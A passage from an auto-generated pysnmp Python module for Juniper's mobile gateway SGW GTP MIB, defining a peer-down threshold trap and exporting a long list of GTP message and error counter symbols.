jnxMbgSgwGtpPrDnTPerPrAlrmClr = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 0, 4)).setObjects(("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpGwIndex"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpGwName"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpInterfaceType"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpPeerName"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpAlarmStatCounter"))
if mibBuilder.loadTexts: jnxMbgSgwGtpPrDnTPerPrAlrmClr.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpPrDnTPerPrAlrmClr.setDescription('Peer down Threshold trap Cleared. This is sent when the number of times a peer connection flaps in a monitor interval come down below the lower threshold.')
mibBuilder.exportSymbols("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", jnxMbgSgwIfGtpV2ICsPkFltManErRx=jnxMbgSgwIfGtpV2ICsPkFltManErRx, jnxMbgSgwGtpV2ICsGREKeyNtFdTx=jnxMbgSgwGtpV2ICsGREKeyNtFdTx, jnxMbgSgwPPIPProtoErrRx=jnxMbgSgwPPIPProtoErrRx, jnxMbgSgwCrtBrReqRx=jnxMbgSgwCrtBrReqRx, jnxMbgSgwPPV2NumMsgRx=jnxMbgSgwPPV2NumMsgRx, jnxMbgSgwPPGtpV2ICsTFTSMANTErRx=jnxMbgSgwPPGtpV2ICsTFTSMANTErRx, jnxMbgSgwIPProtoErrRx=jnxMbgSgwIPProtoErrRx, jnxMbgSgwPPModBrCmdRx=jnxMbgSgwPPModBrCmdRx, jnxMbgSgwGtpPeerGwUpNotif=jnxMbgSgwGtpPeerGwUpNotif, jnxMbgSgwPPGtpV2ICsCtxNotFndTx=jnxMbgSgwPPGtpV2ICsCtxNotFndTx, jnxMbgSgwGtpMib=jnxMbgSgwGtpMib, jnxMbgSgwIfUnSupportedMsgRx=jnxMbgSgwIfUnSupportedMsgRx, jnxMbgSgwPPGtpV2ICsOptIEIncorTx=jnxMbgSgwPPGtpV2ICsOptIEIncorTx, jnxMbgSgwIfGtpV1ErrIndTx=jnxMbgSgwIfGtpV1ErrIndTx, jnxMbgSgwGtpV2ICsUERefusesRx=jnxMbgSgwGtpV2ICsUERefusesRx, jnxMbgSgwPPCreateSessReqRx=jnxMbgSgwPPCreateSessReqRx, jnxMbgSgwPcktLenErrRx=jnxMbgSgwPcktLenErrRx, jnxMbgSgwGtpV2ICsOptIEIncorrTx=jnxMbgSgwGtpV2ICsOptIEIncorrTx, jnxMbgSgwPPGtpV2ICsSysFailTx=jnxMbgSgwPPGtpV2ICsSysFailTx, jnxMbgSgwGtpV2ICsUENotRespTx=jnxMbgSgwGtpV2ICsUENotRespTx, jnxMbgSgwIfGtpV2ICsManIEMissTx=jnxMbgSgwIfGtpV2ICsManIEMissTx, jnxMbgSgwPPGtpV2ICsAPNAcsDenTx=jnxMbgSgwPPGtpV2ICsAPNAcsDenTx, jnxMbgSgwPPGtpV2ICsEIFRNCEnTx=jnxMbgSgwPPGtpV2ICsEIFRNCEnTx, jnxMbgSgwPPGtpV2ICsNoResRx=jnxMbgSgwPPGtpV2ICsNoResRx, jnxMbgSgwGtpV2ICsOptIEIncorrRx=jnxMbgSgwGtpV2ICsOptIEIncorrRx, jnxMbgSgwPPUpdConnSetReqTx=jnxMbgSgwPPUpdConnSetReqTx, jnxMbgSgwUnSupportedMsgRx=jnxMbgSgwUnSupportedMsgRx, jnxMbgSgwRelAcsBrReqTx=jnxMbgSgwRelAcsBrReqTx, jnxMbgSgwPPDelBrCmdRx=jnxMbgSgwPPDelBrCmdRx, jnxMbgSgwIfCrIndTunRespTx=jnxMbgSgwIfCrIndTunRespTx, jnxMbgSgwPPCrIndTunRespRx=jnxMbgSgwPPCrIndTunRespRx, jnxMbgSgwIfGtpV2ICsTFTSMANTErRx=jnxMbgSgwIfGtpV2ICsTFTSMANTErRx, jnxMbgSgwPPModBrCmdTx=jnxMbgSgwPPModBrCmdTx, jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx=jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx, jnxMbgSgwIfGtpV2ICsAcceptPartRx=jnxMbgSgwIfGtpV2ICsAcceptPartRx, jnxMbgSgwPPGtpV2ICsInvPrRx=jnxMbgSgwPPGtpV2ICsInvPrRx, PYSNMP_MODULE_ID=jnxMbgSgwGtpMib, jnxMbgSgwGtpV2ICsAPNAcsDenTx=jnxMbgSgwGtpV2ICsAPNAcsDenTx, jnxMbgSgwPPGTPUnknVerRx=jnxMbgSgwPPGTPUnknVerRx, jnxMbgSgwPPGtpV2ICsRATChgRx=jnxMbgSgwPPGtpV2ICsRATChgRx, jnxMbgSgwPPGtpV2ICsAcceptPartTx=jnxMbgSgwPPGtpV2ICsAcceptPartTx, jnxMbgSgwPPGtpV2ICsRATChgTx=jnxMbgSgwPPGtpV2ICsRATChgTx, jnxMbgSgwGtpV2ICsServDeniedTx=jnxMbgSgwGtpV2ICsServDeniedTx, jnxMbgSgwIfGtpV2ICsInvPrRx=jnxMbgSgwIfGtpV2ICsInvPrRx, jnxMbgSgwIfCrIndTunReqTx=jnxMbgSgwIfCrIndTunReqTx, jnxMbgSgwRelAcsBrRespRx=jnxMbgSgwRelAcsBrRespRx, jnxMbgSgwCreateSessRspTx=jnxMbgSgwCreateSessRspTx, jnxMbgSgwUpdBrRspTx=jnxMbgSgwUpdBrRspTx, jnxMbgSgwPPRxPacketsDropped=jnxMbgSgwPPRxPacketsDropped, jnxMbgSgwDelBrCmdRx=jnxMbgSgwDelBrCmdRx, jnxMbgSgwGtpV2ICsLclDetRx=jnxMbgSgwGtpV2ICsLclDetRx, jnxMbgSgwPPStopPagingIndTx=jnxMbgSgwPPStopPagingIndTx, jnxMbgSgwGtpPrDnTPerPrAlrmClr=jnxMbgSgwGtpPrDnTPerPrAlrmClr, jnxMbgSgwPPModBrRspRx=jnxMbgSgwPPModBrRspRx, jnxMbgSgwPPUpdBrReqRx=jnxMbgSgwPPUpdBrReqRx, jnxMbgSgwGtpV2ICsPTMSISigMMTx=jnxMbgSgwGtpV2ICsPTMSISigMMTx, jnxMbgSgwPPGtpV2ICsMisUnknAPNTx=jnxMbgSgwPPGtpV2ICsMisUnknAPNTx, jnxMbgSgwGtpV2ICsReqRejTx=jnxMbgSgwGtpV2ICsReqRejTx, jnxMbgSgwGtpV2ICsCtxNotFndRx=jnxMbgSgwGtpV2ICsCtxNotFndRx, jnxMbgSgwIfCrtBrReqTx=jnxMbgSgwIfCrtBrReqTx, jnxMbgSgwIfResumeAckTx=jnxMbgSgwIfResumeAckTx, jnxMbgSgwV2NumMsgTx=jnxMbgSgwV2NumMsgTx, jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx=jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx, jnxMbgSgwPPGtpV2ICsInvMsgFmtRx=jnxMbgSgwPPGtpV2ICsInvMsgFmtRx, jnxMbgSgwIfGtpV2ICsInvTotLenTx=jnxMbgSgwIfGtpV2ICsInvTotLenTx, jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx=jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx, jnxMbgSgwPPGtpV2ICsIMSINotKnTx=jnxMbgSgwPPGtpV2ICsIMSINotKnTx, jnxMbgSgwGtpV2ICsUnknownRx=jnxMbgSgwGtpV2ICsUnknownRx, jnxMbgSgwUpdConnSetRspTx=jnxMbgSgwUpdConnSetRspTx, jnxMbgSgwCreateSessReqRx=jnxMbgSgwCreateSessReqRx, jnxMbgSgwGtpV2ICsInvTotLenRx=jnxMbgSgwGtpV2ICsInvTotLenRx, jnxMbgSgwDelBrReqRx=jnxMbgSgwDelBrReqRx, jnxMbgSgwIfV2EchoRespTx=jnxMbgSgwIfV2EchoRespTx, jnxMbgSgwIfGtpV2ICsVerNotSuppTx=jnxMbgSgwIfGtpV2ICsVerNotSuppTx, jnxMbgSgwIfGtpV2ICsRPrNtRspRx=jnxMbgSgwIfGtpV2ICsRPrNtRspRx, jnxMbgSgwIfGtpV2ICsUnexpRptIETx=jnxMbgSgwIfGtpV2ICsUnexpRptIETx, jnxMbgSgwGtpV2ICsRelocFailTx=jnxMbgSgwGtpV2ICsRelocFailTx, jnxMbgSgwGtpV2ICsAllDynAdOccRx=jnxMbgSgwGtpV2ICsAllDynAdOccRx, jnxMbgSgwPPDelSessReqTx=jnxMbgSgwPPDelSessReqTx, jnxMbgSgwDelSessReqRx=jnxMbgSgwDelSessReqRx, jnxMbgSgwPPResumeAckTx=jnxMbgSgwPPResumeAckTx, jnxMbgSgwPPGtpV2ICsSynErTADTx=jnxMbgSgwPPGtpV2ICsSynErTADTx, jnxMbgSgwGtpV2ICsUserAUTHFlRx=jnxMbgSgwGtpV2ICsUserAUTHFlRx, jnxMbgSgwIfGtpV2ICsCmpDetTx=jnxMbgSgwIfGtpV2ICsCmpDetTx, jnxMbgSgwGtpV2ICsDtForNtSupRx=jnxMbgSgwGtpV2ICsDtForNtSupRx, jnxMbgSgwIfGtpV2ICsUnabPageUERx=jnxMbgSgwIfGtpV2ICsUnabPageUERx, jnxMbgSgwPPGtpV2ICsProtoNtSupRx=jnxMbgSgwPPGtpV2ICsProtoNtSupRx, jnxMbgSgwV2VerNotSupTx=jnxMbgSgwV2VerNotSupTx, jnxMbgSgwGtpV2ICsInReFRePrRx=jnxMbgSgwGtpV2ICsInReFRePrRx, jnxMbgSgwIfGtpV2ICsSysFailRx=jnxMbgSgwIfGtpV2ICsSysFailRx, jnxMbgSgwIfGtpV2ICsInReFRePrTx=jnxMbgSgwIfGtpV2ICsInReFRePrTx, jnxMbgSgwPPDlDataNotifTx=jnxMbgSgwPPDlDataNotifTx, jnxMbgSgwIfGtpV2ICsRelocFailRx=jnxMbgSgwIfGtpV2ICsRelocFailRx, jnxMbgSgwDelConnSetRspTx=jnxMbgSgwDelConnSetRspTx, jnxMbgSgwT3RespTmrExpRx=jnxMbgSgwT3RespTmrExpRx, jnxMbgSgwStopPagingIndRx=jnxMbgSgwStopPagingIndRx, jnxMbgSgwDelSessReqTx=jnxMbgSgwDelSessReqTx, jnxMbgSgwGtpV2ICsTFTSysErrRx=jnxMbgSgwGtpV2ICsTFTSysErrRx, jnxMbgSgwPPRelAcsBrRespRx=jnxMbgSgwPPRelAcsBrRespRx, jnxMbgSgwIfDelSessReqRx=jnxMbgSgwIfDelSessReqRx, jnxMbgSgwGtpV2ICsReqAcceptTx=jnxMbgSgwGtpV2ICsReqAcceptTx, jnxMbgSgwPPRelAcsBrRespTx=jnxMbgSgwPPRelAcsBrRespTx, jnxMbgSgwIfGtpV1EchoRespTx=jnxMbgSgwIfGtpV1EchoRespTx, jnxMbgSgwGtpV2ICsAcceptPartTx=jnxMbgSgwGtpV2ICsAcceptPartTx, jnxMbgSgwIfModBrReqRx=jnxMbgSgwIfModBrReqRx, jnxMbgSgwGtpCGlbStatsTable=jnxMbgSgwGtpCGlbStatsTable, jnxMbgSgwGtpV2ICsPkFltSynErrTx=jnxMbgSgwGtpV2ICsPkFltSynErrTx, jnxMbgSgwIfDelBrRspTx=jnxMbgSgwIfDelBrRspTx, jnxMbgSgwV2EchoReqRx=jnxMbgSgwV2EchoReqRx, jnxMbgSgwPPGtpV1EchoReqTx=jnxMbgSgwPPGtpV1EchoReqTx, jnxMbgSgwPPGtpV2ICsUERefusesRx=jnxMbgSgwPPGtpV2ICsUERefusesRx, jnxMbgSgwGtpV2ICsInReFRePrTx=jnxMbgSgwGtpV2ICsInReFRePrTx, jnxMbgSgwIfGtpV2ICsSrvNotSuppRx=jnxMbgSgwIfGtpV2ICsSrvNotSuppRx, jnxMbgSgwPPDelBrRspTx=jnxMbgSgwPPDelBrRspTx, jnxMbgSgwResumeAckRx=jnxMbgSgwResumeAckRx, jnxMbgSgwPPPacketAllocFail=jnxMbgSgwPPPacketAllocFail, jnxMbgSgwPPGtpV2ICsDenINRatTx=jnxMbgSgwPPGtpV2ICsDenINRatTx, jnxMbgSgwUnknMsgRx=jnxMbgSgwUnknMsgRx, jnxMbgSgwPPDelIndTunRespTx=jnxMbgSgwPPDelIndTunRespTx, jnxMbgSgwIfGtpV2ICsUnexpRptIERx=jnxMbgSgwIfGtpV2ICsUnexpRptIERx, jnxMbgSgwIfCrtBrRspTx=jnxMbgSgwIfCrtBrRspTx, jnxMbgSgwGtpV2ICsNewPTNPrefTx=jnxMbgSgwGtpV2ICsNewPTNPrefTx, jnxMbgSgwIfGtpV2ICsUnknownRx=jnxMbgSgwIfGtpV2ICsUnknownRx, jnxMbgSgwGtpPrDnTPerPrAlrmActv=jnxMbgSgwGtpPrDnTPerPrAlrmActv, jnxMbgSgwPPGtpV2ICsPkFltManErRx=jnxMbgSgwPPGtpV2ICsPkFltManErRx, jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx=jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx, jnxMbgSgwIfDelBrFlrIndTx=jnxMbgSgwIfDelBrFlrIndTx, jnxMbgSgwIfGtpV2ICsPkFltManErTx=jnxMbgSgwIfGtpV2ICsPkFltManErTx, jnxMbgSgwStopPagingIndTx=jnxMbgSgwStopPagingIndTx, jnxMbgSgwGtpV2ICsProtoNtSupTx=jnxMbgSgwGtpV2ICsProtoNtSupTx, jnxMbgSgwIfRelAcsBrReqRx=jnxMbgSgwIfRelAcsBrReqRx, jnxMbgSgwGtpV2ICsCmpDetRx=jnxMbgSgwGtpV2ICsCmpDetRx, jnxMbgSgwIfDelBrRspRx=jnxMbgSgwIfDelBrRspRx, jnxMbgSgwPPDelIndTunRespRx=jnxMbgSgwPPDelIndTunRespRx, jnxMbgSgwPPGtpV1UnSupMsgRx=jnxMbgSgwPPGtpV1UnSupMsgRx, jnxMbgSgwPPGtpV1EchoReqRx=jnxMbgSgwPPGtpV1EchoReqRx, jnxMbgSgwIfGtpV2ICsPkFltSynErTx=jnxMbgSgwIfGtpV2ICsPkFltSynErTx, jnxMbgSgwIfCrIndTunReqRx=jnxMbgSgwIfCrIndTunReqRx, jnxMbgSgwGtpV2ICsManIEIncorrTx=jnxMbgSgwGtpV2ICsManIEIncorrTx, jnxMbgSgwIfGtpV2ICsManIEMissRx=jnxMbgSgwIfGtpV2ICsManIEMissRx, jnxMbgSgwPPCreateSessReqTx=jnxMbgSgwPPCreateSessReqTx, jnxMbgSgwIfDelConnSetReqTx=jnxMbgSgwIfDelConnSetReqTx, jnxMbgSgwPPGtpV2ICsPTNotSuppTx=jnxMbgSgwPPGtpV2ICsPTNotSuppTx, jnxMbgSgwPPDlDataAckTx=jnxMbgSgwPPDlDataAckTx, jnxMbgSgwIfDelConnSetRspTx=jnxMbgSgwIfDelConnSetRspTx, jnxMbgSgwPPModBrReqRx=jnxMbgSgwPPModBrReqRx, jnxMbgSgwRxPacketsDropped=jnxMbgSgwRxPacketsDropped, jnxMbgSgwIfGtpV2ICsColNWReqTx=jnxMbgSgwIfGtpV2ICsColNWReqTx, jnxMbgSgwPPGtpV2ICsUnPgUESusRx=jnxMbgSgwPPGtpV2ICsUnPgUESusRx, jnxMbgSgwDelConnSetReqTx=jnxMbgSgwDelConnSetReqTx, jnxMbgSgwGtpV1EchoReqTx=jnxMbgSgwGtpV1EchoReqTx, jnxMbgSgwPPCrtBrRspRx=jnxMbgSgwPPCrtBrRspRx, jnxMbgSgwIfStopPagingIndRx=jnxMbgSgwIfStopPagingIndRx, jnxMbgSgwIfGtpV2ICsLclDetRx=jnxMbgSgwIfGtpV2ICsLclDetRx, jnxMbgSgwIfModBrRspRx=jnxMbgSgwIfModBrRspRx, jnxMbgSgwS11PiggybackMsgTx=jnxMbgSgwS11PiggybackMsgTx, jnxMbgSgwGtpV2ICsSynErTADRx=jnxMbgSgwGtpV2ICsSynErTADRx, jnxMbgSgwPPGtpV2ICsISRDeactTx=jnxMbgSgwPPGtpV2ICsISRDeactTx, jnxMbgSgwIfGtpV2ICsUnPgUESusTx=jnxMbgSgwIfGtpV2ICsUnPgUESusTx, jnxMbgSgwGtpV2ICsUnexpRptIERx=jnxMbgSgwGtpV2ICsUnexpRptIERx, jnxMbgSgwGtpV2ICsUnabPageUETx=jnxMbgSgwGtpV2ICsUnabPageUETx, jnxMbgSgwGtpV2ICsRATChgRx=jnxMbgSgwGtpV2ICsRATChgRx, jnxMbgSgwGtpV2ICsColNWReqTx=jnxMbgSgwGtpV2ICsColNWReqTx, jnxMbgSgwPPGtpV2ICsDtForNtSupRx=jnxMbgSgwPPGtpV2ICsDtForNtSupRx, jnxMbgSgwPPDelConnSetRspRx=jnxMbgSgwPPDelConnSetRspRx, jnxMbgSgwPPResumeNotifRx=jnxMbgSgwPPResumeNotifRx, jnxMbgSgwIfCrtBrRspRx=jnxMbgSgwIfCrtBrRspRx, jnxMbgSgwIfGtpV2ICsInvLenRx=jnxMbgSgwIfGtpV2ICsInvLenRx, jnxMbgSgwPPGtpV2ICsPTNotSuppRx=jnxMbgSgwPPGtpV2ICsPTNotSuppRx, jnxMbgSgwPPGtpV2ICsRMValRcvTx=jnxMbgSgwPPGtpV2ICsRMValRcvTx, jnxMbgSgwPPGtpV2ICsMisUnknAPNRx=jnxMbgSgwPPGtpV2ICsMisUnknAPNRx, jnxMbgSgwGtpV2ICsDeniedINRatRx=jnxMbgSgwGtpV2ICsDeniedINRatRx, jnxMbgSgwGtpV2ICsManIEIncorrRx=jnxMbgSgwGtpV2ICsManIEIncorrRx, jnxMbgSgwGtpV2ICsReqRejRx=jnxMbgSgwGtpV2ICsReqRejRx, jnxMbgSgwPPPiggybackMsgTx=jnxMbgSgwPPPiggybackMsgTx, jnxMbgSgwPPGtpV2ICsInvLenRx=jnxMbgSgwPPGtpV2ICsInvLenRx, jnxMbgSgwIfGtpV2ICsEIFRNCEnRx=jnxMbgSgwIfGtpV2ICsEIFRNCEnRx, jnxMbgSgwPPBrResFlrIndTx=jnxMbgSgwPPBrResFlrIndTx, jnxMbgSgwIfModBrCmdRx=jnxMbgSgwIfModBrCmdRx, jnxMbgSgwIfDelIndTunRespRx=jnxMbgSgwIfDelIndTunRespRx, jnxMbgSgwGtpV1EchoReqRx=jnxMbgSgwGtpV1EchoReqRx, jnxMbgSgwIfDelBrReqTx=jnxMbgSgwIfDelBrReqTx, jnxMbgSgwIfGtpV2ICsUserAUTHFlTx=jnxMbgSgwIfGtpV2ICsUserAUTHFlTx, jnxMbgSgwIfGtpV2ICsCmpDetRx=jnxMbgSgwIfGtpV2ICsCmpDetRx, jnxMbgSgwIfSuspAckTx=jnxMbgSgwIfSuspAckTx, jnxMbgSgwGtpV2ICsCtxNotFndTx=jnxMbgSgwGtpV2ICsCtxNotFndTx, jnxMbgSgwPPGtpV1ErrIndTx=jnxMbgSgwPPGtpV1ErrIndTx, jnxMbgSgwGtpV2ICsUERefusesTx=jnxMbgSgwGtpV2ICsUERefusesTx, jnxMbgSgwPPCrIndTunRespTx=jnxMbgSgwPPCrIndTunRespTx, jnxMbgSgwPPIPVerErrRx=jnxMbgSgwPPIPVerErrRx, jnxMbgSgwIfUpdBrReqTx=jnxMbgSgwIfUpdBrReqTx, jnxMbgSgwIfGtpV2ICsCtxNotFndRx=jnxMbgSgwIfGtpV2ICsCtxNotFndRx, jnxMbgSgwIfGtpV2ICsTFTSysErrTx=jnxMbgSgwIfGtpV2ICsTFTSysErrTx, jnxMbgSgwGtpV2ICsLclDetTx=jnxMbgSgwGtpV2ICsLclDetTx, jnxMbgSgwPPGtpV2ICsPkFltManErTx=jnxMbgSgwPPGtpV2ICsPkFltManErTx, jnxMbgSgwPPGtpV2ICsUENotRespTx=jnxMbgSgwPPGtpV2ICsUENotRespTx, jnxMbgSgwGtpV1ErrIndRx=jnxMbgSgwGtpV1ErrIndRx, jnxMbgSgwIfModBrFlrIndTx=jnxMbgSgwIfModBrFlrIndTx, jnxMbgSgwPPGtpV2ICsPTMSISigMMTx=jnxMbgSgwPPGtpV2ICsPTMSISigMMTx, jnxMbgSgwIfGtpV2ICsSemErTADTx=jnxMbgSgwIfGtpV2ICsSemErTADTx, jnxMbgSgwPPUnSupportedMsgRx=jnxMbgSgwPPUnSupportedMsgRx, jnxMbgSgwIfDelSessRspTx=jnxMbgSgwIfDelSessRspTx, jnxMbgSgwIfGTPUnknVerRx=jnxMbgSgwIfGTPUnknVerRx, jnxMbgSgwPPGTPPortErrRx=jnxMbgSgwPPGTPPortErrRx, jnxMbgSgwIfGtpV2ICsUERefusesTx=jnxMbgSgwIfGtpV2ICsUERefusesTx, jnxMbgSgwDelBrFlrIndRx=jnxMbgSgwDelBrFlrIndRx, jnxMbgSgwS4PiggybackMsgTx=jnxMbgSgwS4PiggybackMsgTx, jnxMbgSgwIfGtpV1EndMarkerRx=jnxMbgSgwIfGtpV1EndMarkerRx, jnxMbgSgwGtpV2ICsGREKeyNtFdRx=jnxMbgSgwGtpV2ICsGREKeyNtFdRx, jnxMbgSgwGtpV2ICsTFTSMANTErTx=jnxMbgSgwGtpV2ICsTFTSMANTErTx, jnxMbgSgwIfBrResCmdTx=jnxMbgSgwIfBrResCmdTx, jnxMbgSgwPPResumeNotifTx=jnxMbgSgwPPResumeNotifTx, jnxMbgSgwIfGtpV2ICsPTNotSuppRx=jnxMbgSgwIfGtpV2ICsPTNotSuppRx, jnxMbgSgwIfGtpV2ICsSrvNotSuppTx=jnxMbgSgwIfGtpV2ICsSrvNotSuppTx, jnxMbgSgwPPGtpV2ICsInReFRePrTx=jnxMbgSgwPPGtpV2ICsInReFRePrTx, jnxMbgSgwPPDelBrFlrIndTx=jnxMbgSgwPPDelBrFlrIndTx, jnxMbgSgwIfGtpV2ICsTFTSysErrRx=jnxMbgSgwIfGtpV2ICsTFTSysErrRx, jnxMbgSgwIfGTPPortErrRx=jnxMbgSgwIfGTPPortErrRx, jnxMbgSgwPPGtpV2ICsSynErTADRx=jnxMbgSgwPPGtpV2ICsSynErTADRx, jnxMbgSgwPPGtpV2ICsPTMSISigMMRx=jnxMbgSgwPPGtpV2ICsPTMSISigMMRx, jnxMbgSgwGtpV2ICsInvMsgFmtTx=jnxMbgSgwGtpV2ICsInvMsgFmtTx, jnxMbgSgwPPGtpV2ICsInvPrTx=jnxMbgSgwPPGtpV2ICsInvPrTx, jnxMbgSgwIfV2NumBytesTx=jnxMbgSgwIfV2NumBytesTx, jnxMbgSgwIfGtpV2ICsUnPgUESusRx=jnxMbgSgwIfGtpV2ICsUnPgUESusRx, jnxMbgSgwPPGtpV1EchoRespRx=jnxMbgSgwPPGtpV1EchoRespRx, jnxMbgSgwGtpV2ICsPageTx=jnxMbgSgwGtpV2ICsPageTx, jnxMbgSgwGtpV2ICsNewPTSIAdbrRx=jnxMbgSgwGtpV2ICsNewPTSIAdbrRx, jnxMbgSgwIfGtpV2ICsAPNAcsDenRx=jnxMbgSgwIfGtpV2ICsAPNAcsDenRx, jnxMbgSgwIfModBrFlrIndRx=jnxMbgSgwIfModBrFlrIndRx, jnxMbgSgwS5PiggybackMsgRx=jnxMbgSgwS5PiggybackMsgRx, jnxMbgSgwIfGtpV2ICsInvMsgFmtRx=jnxMbgSgwIfGtpV2ICsInvMsgFmtRx, jnxMbgSgwGtpV2ICsPTMSISigMMRx=jnxMbgSgwGtpV2ICsPTMSISigMMRx, jnxMbgSgwIfGtpV2ICsRATChgTx=jnxMbgSgwIfGtpV2ICsRATChgTx, jnxMbgSgwPPGtpV2ICsUnknownRx=jnxMbgSgwPPGtpV2ICsUnknownRx, jnxMbgSgwPPDelSessReqRx=jnxMbgSgwPPDelSessReqRx, jnxMbgSgwPPT3RespTmrExpRx=jnxMbgSgwPPT3RespTmrExpRx, jnxMbgSgwIfGtpV2ICsLclDetTx=jnxMbgSgwIfGtpV2ICsLclDetTx, jnxMbgSgwGtpV2ICsServNotSuppRx=jnxMbgSgwGtpV2ICsServNotSuppRx, jnxMbgSgwPPDelConnSetRspTx=jnxMbgSgwPPDelConnSetRspTx, jnxMbgSgwPacketSendFail=jnxMbgSgwPacketSendFail, jnxMbgSgwIfModBrCmdTx=jnxMbgSgwIfModBrCmdTx, jnxMbgSgwGtpV2ICsNoMemTx=jnxMbgSgwGtpV2ICsNoMemTx, jnxMbgSgwIfGtpV2ICsIMSINotKnTx=jnxMbgSgwIfGtpV2ICsIMSINotKnTx, jnxMbgSgwPPGtpV2ICsVerNotSuppRx=jnxMbgSgwPPGtpV2ICsVerNotSuppRx, jnxMbgSgwGtpV2ICsRMValRcvTx=jnxMbgSgwGtpV2ICsRMValRcvTx, jnxMbgSgwIfGtpV2ICsDtForNtSupRx=jnxMbgSgwIfGtpV2ICsDtForNtSupRx, jnxMbgSgwIfUpdBrReqRx=jnxMbgSgwIfUpdBrReqRx, jnxMbgSgwModBrFlrIndTx=jnxMbgSgwModBrFlrIndTx, jnxMbgSgwDlDataNotifTx=jnxMbgSgwDlDataNotifTx, jnxMbgSgwGtpV2ICsPkFltSynErrRx=jnxMbgSgwGtpV2ICsPkFltSynErrRx, jnxMbgSgwPPGtpV2ICsManIEMissRx=jnxMbgSgwPPGtpV2ICsManIEMissRx, jnxMbgSgwCrIndTunRespTx=jnxMbgSgwCrIndTunRespTx, jnxMbgSgwPPCrtBrReqTx=jnxMbgSgwPPCrtBrReqTx, jnxMbgSgwPPGtpV2ICsServDeniedRx=jnxMbgSgwPPGtpV2ICsServDeniedRx)
mibBuilder.exportSymbols("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", jnxMbgSgwBrResFlrIndRx=jnxMbgSgwBrResFlrIndRx, jnxMbgSgwPPModBrReqTx=jnxMbgSgwPPModBrReqTx, jnxMbgSgwIfDlDataAckRx=jnxMbgSgwIfDlDataAckRx, jnxMbgSgwIfGtpV2ICsUENotRespTx=jnxMbgSgwIfGtpV2ICsUENotRespTx, jnxMbgSgwGtpV2ICsRelocFailRx=jnxMbgSgwGtpV2ICsRelocFailRx, jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx=jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx, jnxMbgSgwDelConnSetRspRx=jnxMbgSgwDelConnSetRspRx, jnxMbgSgwGtpV1EndMarkerTx=jnxMbgSgwGtpV1EndMarkerTx, jnxMbgSgwPPSuspNotifRx=jnxMbgSgwPPSuspNotifRx, jnxMbgSgwGtpV2ICsUnexpRptIETx=jnxMbgSgwGtpV2ICsUnexpRptIETx, jnxMbgSgwIfGtpV2ICsReqRejRx=jnxMbgSgwIfGtpV2ICsReqRejRx, jnxMbgSgwModBrRspTx=jnxMbgSgwModBrRspTx, jnxMbgSgwGtpV2ICsAcceptPartRx=jnxMbgSgwGtpV2ICsAcceptPartRx, jnxMbgSgwIfSuspNotifRx=jnxMbgSgwIfSuspNotifRx, jnxMbgSgwPPV2NumMsgTx=jnxMbgSgwPPV2NumMsgTx, jnxMbgSgwPPGtpV2ICsNoMemTx=jnxMbgSgwPPGtpV2ICsNoMemTx, jnxMbgSgwIfGtpV2ICsReqAcceptRx=jnxMbgSgwIfGtpV2ICsReqAcceptRx, jnxMbgSgwPPPcktLenErrRx=jnxMbgSgwPPPcktLenErrRx, jnxMbgSgwBrResCmdTx=jnxMbgSgwBrResCmdTx, jnxMbgSgwIfGtpV2ICsCondIEMsTx=jnxMbgSgwIfGtpV2ICsCondIEMsTx, jnxMbgSgwGtpV2ICsInvLenRx=jnxMbgSgwGtpV2ICsInvLenRx, jnxMbgSgwPPGtpV1T3RespTmrExpRx=jnxMbgSgwPPGtpV1T3RespTmrExpRx, jnxMbgSgwPPGtpV2ICsRMValRcvRx=jnxMbgSgwPPGtpV2ICsRMValRcvRx, jnxMbgSgwS5PiggybackMsgTx=jnxMbgSgwS5PiggybackMsgTx, jnxMbgSgwIfDelIndTunReqTx=jnxMbgSgwIfDelIndTunReqTx, jnxMbgSgwIfDelBrCmdTx=jnxMbgSgwIfDelBrCmdTx, jnxMbgSgwIfGtpV2ICsMisUnknAPNRx=jnxMbgSgwIfGtpV2ICsMisUnknAPNRx, jnxMbgSgwPPGtpV2ICsNoMemRx=jnxMbgSgwPPGtpV2ICsNoMemRx, jnxMbgSgwPPUpdConnSetReqRx=jnxMbgSgwPPUpdConnSetReqRx, jnxMbgSgwDlDataNotiFlrIndRx=jnxMbgSgwDlDataNotiFlrIndRx, jnxMbgSgwPPDlDataNotiFlrIndRx=jnxMbgSgwPPDlDataNotiFlrIndRx, jnxMbgSgwIfV2VerNotSupTx=jnxMbgSgwIfV2VerNotSupTx, jnxMbgSgwPPGtpV2ICsIMSINotKnRx=jnxMbgSgwPPGtpV2ICsIMSINotKnRx, jnxMbgSgwPPRelAcsBrReqRx=jnxMbgSgwPPRelAcsBrReqRx, jnxMbgSgwPPGtpV2ICsInReFRePrRx=jnxMbgSgwPPGtpV2ICsInReFRePrRx, jnxMbgSgwGtpV2ICsPageRx=jnxMbgSgwGtpV2ICsPageRx, jnxMbgSgwIfResumeNotifTx=jnxMbgSgwIfResumeNotifTx, jnxMbgSgwPPGtpV2ICsUnabPageUERx=jnxMbgSgwPPGtpV2ICsUnabPageUERx, jnxMbgSgwIfRxPacketsDropped=jnxMbgSgwIfRxPacketsDropped, jnxMbgSgwGtpV1EchoRespTx=jnxMbgSgwGtpV1EchoRespTx, jnxMbgSgwPPGtpV2ICsUserAUTHFlRx=jnxMbgSgwPPGtpV2ICsUserAUTHFlRx, jnxMbgSgwIfCreateSessReqTx=jnxMbgSgwIfCreateSessReqTx, 